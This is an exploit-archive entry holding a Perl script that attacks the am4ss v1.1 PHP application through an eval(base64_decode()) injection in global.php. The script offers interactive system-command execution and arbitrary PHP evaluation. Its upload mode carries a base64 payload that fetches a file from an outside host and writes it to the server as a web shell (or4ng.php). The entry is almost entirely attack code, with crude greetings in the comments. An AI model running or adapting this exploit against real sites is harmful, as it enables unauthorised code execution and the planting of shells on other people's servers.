am4ss v1.1 Remote Code Execution

2011-08-04T00:00:00
ID 1337DAY-ID-16600
Type zdt
Reporter Or4nG.M4N
Modified 2011-08-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!/usr/bin/perl -w
# Exploit Title: am4ss v1.1 Remote Code Execution
# Version: 1.1
# Author : Or4nG.M4n & i-Hmx < Dev Exploit
# Big Thnks 2 : i-Hmx , sA^Dev!L
# Big dicks to : Duck lamerz Team :))
# Tested on: Windows 8 
use MIME::Base64;
use LWP::UserAgent;
use LWP::Simple;
# About ..
print q(
   anti.virus.team | Or4nG.M4n | alm3refh.cOm Group
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   |  Sp Thnks 2 : sA^Dev!L , i-Hmx , h311 c0d3 , xSs m4n   |
   | Gr33tz : SarBoT511 , Dr.Silv3r , Demetre ,  Lagripe-Dz |
   |  Mr.DH , x-Sh4dow , Pir4t3 ,  b0x , SadhaCker , r00t3r |
   +--------------------------------------------------------+
   | Home :~# 1337s.cc , tryag.cc , sec4ever , r00t-s3c.com |
   +--------------------------------------------------------+
);

# start
if($ARGV[0] =~ "-cm"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "
Please select function to use [system , exec , shell_exec]
function# ";
$func =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "
Command# ";
$execut =<STDIN>;
$exec = $func."('".$execut."');";
$cmd = encode_base64($exec);
$ex = $a1 ."\x2F". $a2 ."global.php?fa=". $cmd ."&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
if(!$content){
}else{
print "\nExecuting cmd ..\n\n";
}
print  $content;
}
}
# End
#injection func
if($ARGV[0] =~ "-ev"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
print "Write PHP code to be executed on the remote site [ don't use <? or ?> ]
Example:phpinfo();";
print "
choose file to dump the results in (eg 1337s.htm)
File name# ";
$myf =<STDIN>;
for($faris=0;$faris<1000;$faris++)
{
print "Eval# ";
$evalcode =<STDIN>;
$evalencoded = encode_base64($evalcode);
$strike = $a1 ."\x2F". $a2 ."global.php?fa=". $evalencoded ."&bn=eval(base64_decode(\$fa));;";
my $content = get $strike;
if(!$content){
}else{
print "\nDumping Results\n\n";
}
open(lst,">>$myf\n");
print lst"$content\n";
close(lst);
}
}
#ended
if($ARGV[0] =~ "-up"){ 
$a1 = $ARGV[1];
$a2 = $ARGV[2];
$ex = $a1."\x2F".$a2."global.php?fa=JGZpbGUgPSBmb3Blbigib3I0bmcucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vdHJhdjFhbi50MzUuY29tL3I1dC50eHQiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICwkc2EpOw==&bn=eval(base64_decode(\$fa));;";
my $content = get $ex;
print "Exploiter\n";
sleep(4);
print  "done .. > $a1 $a2 > or4ng.php < shell.php Enjoy";
}
if($ARGV[0] =~ ""){
print q(
   anti.virus.team | Or4nG.M4n
                            _      _       _          _      _   _
                           / \    | |     | |        / \    | | | |
                          / _ \   | |     | |       / _ \   | |_| |
                         / ___ \  | |___  | |___   / ___ \  |  _  |
   +-----in the name of /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
   | Upload Shell Use : perl am4ss.pl -up http://localhost/ Path/ |
   | Cmd By Functions : perl am4ss.pl -cm http://localhost/ Path/ |
   | Eval php code    : perl am4ss.pl -ev http://localhost/ Path/ |
   +--------------------------------------------------------------+
);
}
# Coded By Or4nG.M4n .. 



#  0day.today [2018-02-21]  #